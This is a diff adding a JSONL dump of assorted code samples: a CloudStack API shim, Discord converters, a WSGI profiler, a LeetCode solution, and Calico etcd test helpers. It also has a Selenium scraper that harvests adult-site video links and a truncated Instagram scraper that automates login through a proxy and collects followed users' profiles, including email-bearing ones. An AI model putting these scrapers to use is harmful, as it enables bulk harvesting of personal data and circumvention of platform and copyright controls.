diff --git "a/5252.jsonl" "b/5252.jsonl" new file mode 100644--- /dev/null +++ "b/5252.jsonl" @@ -0,0 +1,815 @@ +{"seq_id":"537815763","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nfrom flask import current_app\n\nfrom ec2stack.providers import cloudstack\nfrom ec2stack.providers.cloudstack import requester, service_offerings, zones\nfrom ec2stack import helpers, errors\n\n\n@helpers.authentication_required\ndef describe_instances():\n args = {'command': 'listVirtualMachines'}\n response = cloudstack.describe_item(\n args, 'virtualmachine', errors.invalid_instance_id, 'InstanceId'\n )\n\n return _describe_instances_response(\n response\n )\n\n\ndef describe_instance_by_id(instance_id):\n args = {'id': instance_id, 'command': 'listVirtualMachines'}\n response = cloudstack.describe_item_request(\n args, 'virtualmachine', errors.invalid_instance_id\n )\n return response\n\n\ndef _describe_instances_response(response):\n return {\n 'template_name_or_list': 'instances.xml',\n 'response_type': 'DescribeInstancesResponse',\n 'response': response\n }\n\n\n@helpers.authentication_required\ndef describe_instance_attribute():\n instance_id = helpers.get('InstanceId')\n attribute = helpers.get('Attribute')\n\n supported_attribute_map = {\n 'instanceType': 'serviceofferingname',\n 'groupSet': 'securitygroup'\n }\n\n if attribute not in supported_attribute_map.iterkeys():\n errors.invalid_paramater_value(\n 'The specified attribute is not valid, please specify a valid ' +\n 'instance attribute.'\n )\n\n response = describe_instance_by_id(instance_id)\n return _describe_instance_attribute_response(\n response, attribute, supported_attribute_map)\n\n\ndef _describe_instance_attribute_response(response, attribute, attr_map):\n response = {\n 'template_name_or_list': 'instance_attribute.xml',\n 'response_type': 'DescribeInstanceAttributeResponse',\n 'attribute': attribute,\n 'response': response[attr_map[attribute]],\n 'id': response['id']\n }\n\n return response\n\n\n@helpers.authentication_required\ndef run_instance():\n helpers.require_parameters(\n ['ImageId', 'MinCount', 'MaxCount'])\n response = _run_instance_request()\n return _run_instance_response(response)\n\n\ndef _run_instance_request():\n args = {}\n\n if helpers.get('InstanceType') is None:\n instance_type = 'm1.small'\n else:\n instance_type = helpers.get('InstanceType')\n\n if instance_type in current_app.config['INSTANCE_TYPE_MAP']:\n instance_type = current_app.config[\n 'INSTANCE_TYPE_MAP'][instance_type]\n else:\n instance_type = instance_type\n\n args['serviceofferingid'] = \\\n service_offerings.get_service_offering(instance_type)['id']\n args['templateid'] = helpers.get('ImageId')\n\n if helpers.contains_parameter('Placement.AvailabilityZone'):\n args['zoneid'] = zones.get_zone(\n helpers.get('Placement.AvailabilityZone')\n )\n else:\n args['zoneid'] = zones.get_zone(\n current_app.config['CLOUDSTACK_DEFAULT_ZONE']\n )['id']\n\n if helpers.contains_parameter('KeyName'):\n args['keypair'] = helpers.get('KeyName')\n\n if helpers.contains_parameter('UserData'):\n args['userdata'] = helpers.get('UserData')\n\n if helpers.contains_parameter_with_keyword('SecurityGroupId.'):\n keys = helpers.get_request_parameter_keys('SecurityGroupId.')\n securitygroupids = []\n\n for key in keys:\n securitygroupids.append(helpers.get(key))\n\n args['securitygroupids'] = \",\".join(securitygroupids)\n\n if helpers.contains_parameter_with_keyword('SecurityGroup.'):\n keys = helpers.get_request_parameter_keys('SecurityGroup.')\n securitygroupnames = []\n\n for key in keys:\n securitygroupnames.append(helpers.get(key))\n\n args['securitygroupnames'] = \",\".join(securitygroupnames)\n\n args['command'] = 'deployVirtualMachine'\n\n response = requester.make_request_async(args)\n\n return response\n\n\ndef _run_instance_response(response):\n if 'errortext' in response:\n if 'Invalid parameter templateid' in response['errortext']:\n errors.invalid_image_id()\n elif 'Unable to find group' in response['errortext']:\n errors.invalid_security_group()\n elif 'Invalid parameter securitygroupids' in response['errortext']:\n errors.invalid_security_group()\n elif 'A key pair with name' in response['errortext']:\n errors.invalid_keypair_name()\n else:\n errors.invalid_paramater_value(response['errortext'])\n else:\n response = response['virtualmachine']\n response = {\n 'template_name_or_list': 'run_instance.xml',\n 'response_type': 'RunInstancesResponse',\n 'response': response\n }\n\n return response\n\n\n@helpers.authentication_required\ndef start_instance():\n helpers.require_parameters(['InstanceId.1'])\n instance_id = helpers.get('InstanceId.1')\n previous_instance_state_description = describe_instance_by_id(instance_id)\n new_instance_state_description = _start_instance_request(instance_id)\n return _start_instance_response(\n previous_instance_state_description,\n new_instance_state_description\n )\n\n\ndef _start_instance_request(instance_id):\n args = {'command': 'startVirtualMachine',\n 'id': instance_id}\n\n response = requester.make_request_async(args)\n\n response = response['virtualmachine']\n\n return response\n\n\ndef _start_instance_response(previous_state, new_state):\n response = {\n 'template_name_or_list': 'change_instance_state.xml',\n 'response_type': 'StartInstancesResponse',\n 'previous_state': previous_state,\n 'new_state': new_state\n }\n\n return response\n\n\n@helpers.authentication_required\ndef terminate_instance():\n helpers.require_parameters(['InstanceId.1'])\n instance_id = helpers.get('InstanceId.1')\n previous_instance_state_description = describe_instance_by_id(instance_id)\n new_instance_state_description = _terminate_instance_request(instance_id)\n return _terminate_instance_response(\n previous_instance_state_description,\n new_instance_state_description\n )\n\n\ndef _terminate_instance_request(instance_id):\n args = {'command': 'destroyVirtualMachine',\n 'id': instance_id}\n\n response = requester.make_request_async(args)\n\n response = response['virtualmachine']\n\n return response\n\n\ndef _terminate_instance_response(previous_state, new_state):\n response = {\n 'template_name_or_list': 'change_instance_state.xml',\n 'response_type': 'TerminateInstancesResponse',\n 'previous_state': previous_state,\n 'new_state': new_state\n }\n\n return response\n\n\n@helpers.authentication_required\ndef stop_instance():\n helpers.require_parameters(['InstanceId.1'])\n instance_id = helpers.get('InstanceId.1')\n previous_instance_state_description = describe_instance_by_id(instance_id)\n new_instance_state_description = _stop_instance_request(instance_id)\n return _stop_instance_response(\n previous_instance_state_description,\n new_instance_state_description\n )\n\n\ndef _stop_instance_request(instance_id):\n args = {'command': 'stopVirtualMachine',\n 'id': instance_id}\n response = requester.make_request_async(args)\n response = response['virtualmachine']\n return response\n\n\ndef _stop_instance_response(previous_state, new_state):\n response = {\n 'template_name_or_list': 'change_instance_state.xml',\n 'response_type': 'StopInstancesResponse',\n 'previous_state': previous_state,\n 'new_state': new_state\n }\n\n return response\n\n\n@helpers.authentication_required\ndef reboot_instance():\n helpers.require_parameters(['InstanceId.1'])\n instance_id = helpers.get('InstanceId.1')\n _reboot_instance_request(instance_id)\n return _reboot_instance_response()\n\n\ndef _reboot_instance_request(instance_id):\n args = {'command': 'rebootVirtualMachine',\n 'id': instance_id}\n response = requester.make_request_async(args)\n response = response['virtualmachine']\n return response\n\n\ndef _reboot_instance_response():\n response = {\n 'template_name_or_list': 'status.xml',\n 'response_type': 'RebootInstancesResponse',\n 'return': 'true'\n }\n\n return response\n","sub_path":"ec2stack/providers/cloudstack/instances.py","file_name":"instances.py","file_ext":"py","file_size_in_byte":8366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"517051903","text":"import discord\nimport string\n\nfrom discord.ext import commands\n\n\nclass without_whitespace(commands.clean_content):\n\n async def convert(self, ctx, arg):\n result = await super().convert(ctx, arg)\n\n if any(s in result for s in string.whitespace[1:]):\n raise commands.BadArgument(ctx.lang[\"fun\"][\"alpha_needed\"])\n\n return result\n\n\nclass EnumConverter(commands.Converter):\n\n __qualname__ = \"Enum\"\n\n def __init__(self, enum_cls):\n self.enum_cls = enum_cls\n\n async def convert(self, ctx, arg):\n arg = arg.lower()\n\n result = discord.utils.find(\n lambda x: x[0].lower() == arg,\n self.enum_cls.__members__.items())\n\n if result is None:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"cant_convert_enum\"].format(\n self.enum_cls.__qualname__))\n\n return result[1]\n\n @staticmethod\n def convert_value(enum_cls, value):\n return discord.utils.find(\n lambda x: x.value == value,\n enum_cls.__members__.values())\n\n\nclass CommandConverter(commands.Converter):\n\n __qualname__ = \"Command\"\n\n def __init__(self, cls=commands.Command):\n self.cls = cls\n\n async def convert(self, ctx, arg):\n command = ctx.bot.get_command(arg)\n\n if command is None:\n raise commands.BadArgument(ctx.lang[\"help\"][\"command_not_found\"])\n\n if not isinstance(command, self.cls):\n raise commands.BadArgument(ctx.lang[\"errors\"][\"ivalid_command\"].format(\n self.cls.__qualname__))\n\n return command\n\n\nclass ModuleConverter(commands.Converter):\n\n __qualname__ = \"Module\"\n\n async def convert(self, ctx, arg):\n module = ctx.bot.get_cog(arg)\n\n if module is None:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"invalid_module\"])\n\n return module\n\n\nclass uint(commands.Converter):\n\n __qualname__ = \"uint\"\n\n def __init__(self, include_zero=False):\n self.include_zero = include_zero\n\n async def convert(self, ctx, arg):\n arg = int(arg)\n\n if arg <= 0 and not self.include_zero:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"arg_over_zero\"])\n\n if arg < 0:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"arg_over_or_equal_zero\"])\n\n return ctx.bot.db._make_safe_value(arg)\n\n\nclass Index:\n\n __slots__ = (\"value\")\n __qualname__ = \"uint\"\n\n def __init__(self, value: int):\n self.value = value\n\n def humanize(self) -> int:\n return self.value + 1\n\n\nclass IndexConverter(uint):\n\n __qualname__ = \"uint\"\n\n async def convert(self, ctx, arg):\n convertered = await super().convert(ctx, arg) - 1\n\n return Index(convertered if convertered >= 0 else 0)\n\n\nclass HumanTime(commands.Converter):\n\n SECONDS_IN_YEAR = 31536000\n\n async def convert(self, ctx, arg):\n arg = arg.lower()\n\n seconds_in = ctx.lang[\"time_map\"]\n\n try:\n total_seconds = int(arg[:-1]) * seconds_in[arg[-1]]\n return min(max(1, total_seconds), self.SECONDS_IN_YEAR)\n except Exception:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"time_convert_failed\"])\n\n\nclass NotAuthor(commands.MemberConverter):\n\n async def convert(self, ctx, argument):\n member = await super().convert(ctx, argument)\n\n if member == ctx.author:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"cant_use_to_yourself\"])\n\n return member\n\n\nclass EqualMember(NotAuthor):\n\n async def convert(self, ctx, arg):\n member = await super().convert(ctx, arg)\n\n if member.top_role >= ctx.guild.me.top_role or ctx.guild.owner == member:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"member_over_bot\"].format(\n ctx.bot.user.mention, member.mention))\n\n if ctx.author == ctx.guild.owner:\n return member\n\n member_perms = ctx.channel.permissions_for(member)\n author_perms = ctx.channel.permissions_for(ctx.author)\n\n if author_perms <= member_perms and not ctx.bot.is_owner(ctx.author):\n raise commands.BadArgument(\n ctx.lang[\"errors\"][\"member_has_eq_over_perms\"].format(member.mention))\n\n return member\n\n\nclass EqualRole(commands.RoleConverter):\n\n async def convert(self, ctx, arg):\n role = await super().convert(ctx, arg)\n\n if role == ctx.guild.get_role(ctx.guild.id):\n raise commands.BadArgument(ctx.lang[\"errors\"][\"everyone_role\"])\n\n if role.managed:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"managed_role\"].format(\n role.mention))\n\n if (role >= ctx.author.top_role and not ctx.bot.is_owner(ctx.author)) or \\\n role >= ctx.guild.me.top_role:\n raise commands.BadArgument(\n ctx.lang[\"errors\"][\"role_over_top_role\"].format(\n role.mention, ctx.bot.user.mention))\n\n return role\n","sub_path":"src/cogs/utils/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"150591443","text":"# some code taken from flask_debug toolbar\nimport time\nimport re\ntry:\n from cProfile import Profile\nexcept ImportError:\n from profile import Profile\nimport pstats\nfrom wsgiref.headers import Headers\nfrom jinja2 import Template\nfrom nanowsgiprofiler.helper import *\nif PY2:\n from Cookie import Cookie\nelse:\n from http.cookies import BaseCookie as Cookie\n\n\n_file_path = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(_file_path, 'profiler.html'), 'rb') as _f:\n _template = Template(_f.read().decode('utf-8'))\n\n_find_charset = re.compile(r'.+charset=([^ ;]+)')\n\n\nclass NanoProfilerMiddleware(object):\n SIMPLE_OUTPUT_TOGGLE_KEY = '__nanopro_s_o'\n\n def __init__(self, app, simple_output=True):\n self.toggle_key = '_profiler'\n self.enable_value = 'on'\n self._app = app\n self.simple_output = simple_output\n\n def _intercept_call(self):\n \"\"\"Return (run_app, resp_body, saved_ss_args). After calling run_app(environ)\n resp_body will contain response, and saved_ss_args contain args which\n app used to call start_response.\"\"\"\n resp_body, saved_ss_args = [], []\n\n def start_response_proxy(*args):\n saved_ss_args.extend(args)\n return resp_body.append\n\n def run_app(environ):\n app_iter = self._app(environ, start_response_proxy)\n resp_body.extend(app_iter)\n if hasattr(app_iter, 'close'):\n app_iter.close()\n\n return run_app, resp_body, saved_ss_args\n\n def __call__(self, environ, start_response):\n key_morsel = Cookie(environ.get('HTTP_COOKIE', '')).get(self.toggle_key)\n # useful vars\n query = query_str2dict(environ.get('QUERY_STRING'))\n enable_by_cookie = key_morsel.value == self.enable_value if key_morsel else False\n enable_by_query = query.get(self.toggle_key) == self.enable_value\n # pop toggle_key from query dic to avoid case: '?_profile=on&_profile='\n disable = query.pop(self.toggle_key, None) == '' # only can be disabled by query\n enable = not disable and (enable_by_query or enable_by_cookie)\n\n run_app, resp_body, saved_ss_args = self._intercept_call()\n\n # processing cookies and queries\n so = query.pop(self.SIMPLE_OUTPUT_TOGGLE_KEY, None)\n if so is not None:\n self.simple_output = so == 'True'\n cookie_to_set = None\n if enable_by_query and not enable_by_cookie:\n cookie_to_set = '%s=%s; Path=/; HttpOnly' % (self.toggle_key, self.enable_value)\n elif disable:\n cookie_to_set = '%s=; Path=/; Max-Age=1; HttpOnly' % self.toggle_key\n\n if enable:\n start = time.time()\n profile = Profile()\n profile.runcall(run_app, environ) # here we call the WSGI app\n elapsed = time.time() - start\n else:\n profile = elapsed = None # for annoying IDE\n run_app(environ)\n\n status, headers = saved_ss_args[:2]\n headers_dic = Headers(headers)\n if cookie_to_set:\n headers_dic.add_header('Set-Cookie', cookie_to_set)\n\n # insert result into response\n content_type = headers_dic.get('Content-Type', '')\n if (enable and status.startswith('200') and content_type.startswith('text/html')):\n environ['QUERY_STRING'] = dict2query_str(query)\n\n matched = _find_charset.match(content_type)\n encoding = matched.group(1) if matched else 'ascii'\n rendered = self.render_result(profile, elapsed, environ).encode(encoding, 'replace')\n resp_body = [insert_into_body(rendered, b''.join(resp_body))]\n headers_dic['Content-Length'] = str(len(resp_body[0]))\n start_response(status, headers, saved_ss_args[2] if len(saved_ss_args) == 3 else None)\n return resp_body\n\n def render_result(self, profile, time_elapsed, environ):\n profile.create_stats()\n stats = profile.stats\n fmt = '{:.2f}'.format\n\n function_calls = []\n for func, info in iteritems(stats):\n current = {}\n filename = pstats.func_std_string(func)\n # hide our hook functions\n if filename.startswith(_file_path):\n continue\n\n # col0: filename\n if filename.startswith(('{', '<')): # built-in functions\n name, name_full = filename, 'n/a'\n else: # functions from library and our project\n name, name_full = shorten_filename(filename), filename\n current['filename'], current['filename_full'] = name, name_full\n\n # skip functions that is in library or built-in\n if self.simple_output and name.startswith(('{', '<')):\n continue\n\n # col1: number of calls\n if info[0] != info[1]:\n current['ncalls'] = '%d/%d' % (info[1], info[0])\n else:\n current['ncalls'] = info[1]\n # col2: total time\n current['tottime'] = fmt(info[2] * 1000)\n # col3: quotient of total time divided by number of calls\n current['percall'] = fmt(info[2] * 1000 / info[1]) if info[1] else 0\n # col4: cumulative time\n current['cumtime'] = fmt(info[3] * 1000)\n # col5: quotient of the cumulative time divided by the number of\n # primitive calls.\n current['percall_cum'] = fmt(info[3] * 1000 / info[0]) if info[0] else 0\n\n function_calls.append(current)\n\n path = reconstruct_path(environ) + ('&' if environ.get('QUERY_STRING') else '?')\n\n return _template.render(\n ms_elapsed='{:.1f}'.format(time_elapsed * 1000),\n function_calls=function_calls,\n disable_url=path + '%s=' % self.toggle_key,\n toggle_simple_output_url=path + '%s=%s' % (self.SIMPLE_OUTPUT_TOGGLE_KEY,\n not self.simple_output),\n simple_output=self.simple_output\n )\n","sub_path":"nanowsgiprofiler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"450448824","text":"import time\nimport urllib.parse\n\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport requests\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nimport cachetools\n\nfrom lxml import etree\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport re\nimport redis\n\nredis = redis.Redis(host='127.0.0.1', port=6379, db=1)\n\nclass FastDriver(webdriver.Chrome):\n def __init__(self):\n options = webdriver.ChromeOptions()\n\n # 1允许所有图片;2阻止所有图片;3阻止第三方服务器图片\n prefs = {\n 'profile.default_content_setting_values': {\n 'images': 2\n }\n }\n options.add_experimental_option('prefs', prefs)\n # 无痕模式\n options.add_argument(\"--incognito\")\n options.add_argument(\"--headless\")\n capa = DesiredCapabilities.CHROME\n capa[\"pageLoadStrategy\"] = \"none\"\n super().__init__(options=options, desired_capabilities=capa)\n\n\ndef get_urls_data():\n key = '腿'\n for page in range(10):\n url = 'https://www.pornhub.com/video/search?search=%s&page=%s' % (\n key, str(page + 1))\n print('--->开始页数%d'%page)\n yield get_page_data(url)\n\n\ndef get_page_data(url):\n # drive = webdriver.Chrome()\n driver = FastDriver()\n try:\n driver.get(url)\n WebDriverWait(driver, 20).until(\n EC.presence_of_element_located((By.ID, 'videoSearchResult')))\n except:\n print('加载超过20秒,强制停止加载....')\n # 当页面加载时间超过设定时间,通过执行Javascript来stop加载,即可执行后续动作\n data = driver.page_source\n driver.close()\n return data\n\n\ndef get_url(data):\n URL = 'https://www.pornhub.com'\n # file = open('1.html', encoding='utf-8')\n # data = file.read()\n # noinspection PyUnresolvedReferences\n html = etree.HTML(data)\n title = html.xpath(\n '//ul[@id=\"videoSearchResult\"]//span[@class=\"title\"]/a/@title')\n url = html.xpath(\n '//ul[@id=\"videoSearchResult\"]//span[@class=\"title\"]/a/@href')\n rate = html.xpath(\n '//div[@class=\"rating-container up\"]//div[@class=\"value\"]/text()')\n result = []\n for _ in range(20):\n result.append({\"url\": URL + url[_], \"title\": title[_],'rate':int(rate[_][:-1])})\n\n\n return result\n\n\ndef get_down_load_rul(url):\n drive = FastDriver()\n try:\n drive.get('https://www.savido.net')\n WebDriverWait(drive, 20).until(\n EC.presence_of_element_located((By.ID, 'curl')))\n drive.find_element_by_id('curl').send_keys(url)\n drive.find_element_by_id('downloadButton').click()\n WebDriverWait(drive, 20).until(\n EC.presence_of_element_located((By.CLASS_NAME, 'table-responsive')))\n data = drive.page_source\n html = etree.HTML(data)\n re = html.xpath('//td/a/@href')\n except:\n time.sleep(10)\n return\n drive.close()\n if len(re) > 0:\n return re.pop()\n\n\ndef main():\n for page_data in get_urls_data():\n for _ in get_url(page_data):\n _url = _.get('url')\n _title = _.get('title')\n _rate = _.get('rate',0)\n if _rate<60:\n continue\n url = get_down_load_rul(_url)\n print('--->开始抓取%s'%url)\n if url:\n file = open('3.txt', encoding='utf-8', mode='a')\n file.write(url + '\\n')\n file.close()\n video = re.search(r\"\\w+_.+\\.mp4\",url).group()\n if video:\n redis.set(video, _title)\n print('-->成功抓取%s'%_title\n )\n # url_down_load(url,_title)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"demo/web_drive.py","file_name":"web_drive.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"487226017","text":"# Definition for a binary tree node.\r\n# class TreeNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\n\"\"\"BFS approach\"\"\"\r\n\r\n#Accepted on Leetcode\r\n#Time complexity - O(N) as we are visiting every node\r\n#Space complexity - O(N) for queue\r\n\r\n\r\nfrom collections import deque\r\nimport sys\r\n\r\nclass Solution(object):\r\n def largestValues(self, root):\r\n \"\"\"\r\n :type root: TreeNode\r\n :rtype: List[int]\r\n \"\"\"\r\n res = []\r\n #Edge case\r\n if root == None:\r\n return res\r\n q = deque()\r\n q.append(root)\r\n while len(q) > 0:\r\n size = len(q)\r\n max_val = -sys.maxsize - 1 #Setting max_val to be the machine's lowest word size\r\n for i in range(size):\r\n curr = q.popleft()\r\n if curr.val >= max_val:\r\n max_val = curr.val\r\n if curr.left:\r\n q.append(curr.left)\r\n if curr.right:\r\n q.append(curr.right)\r\n res.append(max_val)\r\n return res","sub_path":"largestvalueinTreeRow.py","file_name":"largestvalueinTreeRow.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"218503720","text":"# Copyright (c) 2015-2016 Tigera, Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport json\nimport logging\nimport os\nimport re\nimport socket\nimport sys\nfrom subprocess import CalledProcessError\nfrom subprocess import check_output, STDOUT\n\nimport termios\n\nfrom tests.st.utils.exceptions import CommandExecError\n\nLOCAL_IP_ENV = \"MY_IP\"\nLOCAL_IPv6_ENV = \"MY_IPv6\"\nlogger = logging.getLogger(__name__)\n\nETCD_SCHEME = os.environ.get(\"ETCD_SCHEME\", \"http\")\nETCD_CA = os.environ.get(\"ETCD_CA_CERT_FILE\", \"\")\nETCD_CERT = os.environ.get(\"ETCD_CERT_FILE\", \"\")\nETCD_KEY = os.environ.get(\"ETCD_KEY_FILE\", \"\")\nETCD_HOSTNAME_SSL = \"etcd-authority-ssl\"\n\n\"\"\"\nCompile Regexes\n\"\"\"\n# Splits into groups that start w/ no whitespace and contain all lines below\n# that start w/ whitespace\nINTERFACE_SPLIT_RE = re.compile(r'(\\d+:.*(?:\\n\\s+.*)+)')\n# Grabs interface name\nIFACE_RE = re.compile(r'^\\d+: (\\S+):')\n# Grabs v4 addresses\nIPV4_RE = re.compile(r'inet ((?:\\d+\\.){3}\\d+)/\\d+')\n# Grabs v6 addresses\nIPV6_RE = re.compile(r'inet6 ([a-fA-F\\d:]+)/\\d{1,3}')\n\n\ndef calicoctl(command):\n \"\"\"\n Convenience function for abstracting away calling the calicoctl\n command.\n\n Raises a CommandExecError() if the command returns a non-zero\n return code.\n\n :param command: The calicoctl command line parms as a single string.\n :return: The output from the command with leading and trailing\n whitespace removed.\n \"\"\"\n calicoctl = os.environ.get(\"CALICOCTL\", \"/code/dist/calicoctl\")\n\n if ETCD_SCHEME == \"https\":\n etcd_auth = \"%s:2379\" % ETCD_HOSTNAME_SSL\n else:\n etcd_auth = \"%s:2379\" % get_ip()\n # Export the environment, in case the command has multiple parts, e.g.\n # use of | or ;\n #\n # Pass in all etcd params, the values will be empty if not set anyway\n calicoctl = \"export ETCD_AUTHORITY=%s; \" \\\n \"export ETCD_SCHEME=%s; \" \\\n \"export ETCD_CA_CERT_FILE=%s; \" \\\n \"export ETCD_CERT_FILE=%s; \" \\\n \"export ETCD_KEY_FILE=%s; %s\" % \\\n (etcd_auth, ETCD_SCHEME, ETCD_CA, ETCD_CERT, ETCD_KEY,\n calicoctl)\n\n return log_and_run(calicoctl + \" \" + command)\n\n\ndef get_ip(v6=False):\n \"\"\"\n Return a string of the IP of the hosts interface.\n Try to get the local IP from the environment variables. This allows\n testers to specify the IP address in cases where there is more than one\n configured IP address for the test system.\n \"\"\"\n env = LOCAL_IPv6_ENV if v6 else LOCAL_IP_ENV\n ip = os.environ.get(env)\n if not ip:\n logger.debug(\"%s not set; try to auto detect IP.\", env)\n socket_type = socket.AF_INET6 if v6 else socket.AF_INET\n s = socket.socket(socket_type, socket.SOCK_DGRAM)\n remote_ip = \"2001:4860:4860::8888\" if v6 else \"8.8.8.8\"\n s.connect((remote_ip, 0))\n ip = s.getsockname()[0]\n s.close()\n else:\n logger.debug(\"Got local IP from %s=%s\", env, ip)\n\n return ip\n\n\n# Some of the commands we execute like to mess with the TTY configuration, which can break the\n# output formatting. As a wrokaround, save off the terminal settings and restore them after\n# each command.\n_term_settings = termios.tcgetattr(sys.stdin.fileno())\n\n\ndef log_and_run(command, raise_exception_on_failure=True):\n def log_output(results):\n if results is None:\n logger.info(\" # \")\n\n lines = results.split(\"\\n\")\n for line in lines:\n logger.info(\" # %s\", line.rstrip())\n\n try:\n logger.info(\"%s\", command)\n try:\n results = check_output(command, shell=True, stderr=STDOUT).rstrip()\n finally:\n # Restore terminal settings in case the command we ran manipulated them. Note:\n # under concurrent access, this is still not a perfect solution since another thread's\n # child process may break the settings again before we log below.\n termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, _term_settings)\n log_output(results)\n return results\n except CalledProcessError as e:\n # Wrap the original exception with one that gives a better error\n # message (including command output).\n logger.info(\" # Return code: %s\", e.returncode)\n log_output(e.output)\n if raise_exception_on_failure:\n raise CommandExecError(e)\n\ndef curl_etcd(path, options=None, recursive=True, ip=None):\n \"\"\"\n Perform a curl to etcd, returning JSON decoded response.\n :param path: The key path to query\n :param options: Additional options to include in the curl\n :param recursive: Whether we want recursive query or not\n :return: The JSON decoded response.\n \"\"\"\n if options is None:\n options = []\n if ETCD_SCHEME == \"https\":\n # Etcd is running with SSL/TLS, require key/certificates\n rc = check_output(\n \"curl --cacert %s --cert %s --key %s \"\n \"-sL https://%s:2379/v2/keys/%s?recursive=%s %s\"\n % (ETCD_CA, ETCD_CERT, ETCD_KEY, ETCD_HOSTNAME_SSL,\n path, str(recursive).lower(), \" \".join(options)),\n shell=True)\n else:\n rc = check_output(\n \"curl -sL http://%s:2379/v2/keys/%s?recursive=%s %s\"\n % (ip, path, str(recursive).lower(), \" \".join(options)),\n shell=True)\n\n return json.loads(rc.strip())\n\ndef wipe_etcd(ip):\n # Delete /calico if it exists. This ensures each test has an empty data\n # store at start of day.\n curl_etcd(\"calico\", options=[\"-XDELETE\"], ip=ip)\n\n # Disable Usage Reporting to usage.projectcalico.org\n # We want to avoid polluting analytics data with unit test noise\n curl_etcd(\"calico/v1/config/UsageReportingEnabled\",\n options=[\"-XPUT -d value=False\"], ip=ip)\n","sub_path":"tests/st/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"68918455","text":"'''Instagram WebScraping Following Collector'''\n\nfrom bs4 import BeautifulSoup\nfrom seleniumwire import webdriver\nfrom selenium.common.exceptions import InvalidArgumentException, NoSuchElementException, TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom scraper.models import Users\nfrom time import sleep\nimport re\n\n\nclass Cliker:\n def __init__(self, profiles, private_only: False, business_only: False, email_only: False, proxy_port: None,\n proxy: ''):\n self.business_only = business_only\n self.private_only = private_only\n self.email_only = email_only\n self.profiles = profiles\n self.options = None\n\n if proxy != '':\n self.options = {\n 'proxy': {\n 'http': 'http://{}'.format(proxy),\n 'https': 'https://{}'.format(proxy),\n 'no_proxy': 'localhost,127.0.0.1,dev_server:8080'\n }\n }\n\n firefox_profile = webdriver.FirefoxProfile()\n firefox_profile.set_preference(\"intl.accept_languages\", 'en-us')\n firefox_profile.update_preferences()\n\n fireFoxOptions = webdriver.FirefoxOptions()\n fireFoxOptions.headless = True\n\n try:\n self.driver = webdriver.Firefox(seleniumwire_options=self.options, firefox_profile=firefox_profile,\n firefox_options=fireFoxOptions)\n sleep(5)\n self.driver.set_window_position(0, 0)\n self.driver.set_window_size(1024, 768)\n\n except InvalidArgumentException:\n raise exit()\n\n self.driver.get('https://www.instagram.com/')\n sleep(2)\n\n def login(self, phone, password):\n try:\n WebDriverWait(self.driver, 60).until(\n EC.presence_of_element_located((By.XPATH, '//*[@id=\"loginForm\"]/div/div[2]/div/label/input')))\n except TimeoutException:\n raise TimeoutException\n\n phone_field = self.driver.find_element_by_xpath('//*[@id=\"loginForm\"]/div/div[1]/div/label/input')\n password_field = self.driver.find_element_by_xpath('//*[@id=\"loginForm\"]/div/div[2]/div/label/input')\n phone_field.send_keys(phone)\n password_field.send_keys(password)\n login = self.driver.find_element_by_xpath('//*[@id=\"loginForm\"]/div/div[3]/button/div')\n WebDriverWait(self.driver, 60).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"loginForm\"]/div/div[3]/button/div')))\n self.driver.execute_script(\"arguments[0].click();\", login)\n\n def find_profile(self, profile):\n try:\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located(\n (By.XPATH, '//*[@id=\"react-root\"]/section/nav/div[2]/div/div/div[2]/input')))\n except: pass\n\n self.driver.get('https://www.instagram.com/{}'.format(profile))\n sleep(2)\n\n def click_following(self):\n try:\n WebDriverWait(self.driver, 60).until(\n EC.presence_of_element_located(\n (By.XPATH, '//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[2]/a')))\n except TimeoutException:\n raise TimeoutException\n\n try:\n element = self.driver.find_element_by_xpath(\n '//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[3]/a')\n self.driver.execute_script(\"arguments[0].click();\", element)\n\n except:\n raise AttributeError\n\n try:\n WebDriverWait(self.driver, 60).until(\n EC.presence_of_element_located((By.XPATH, 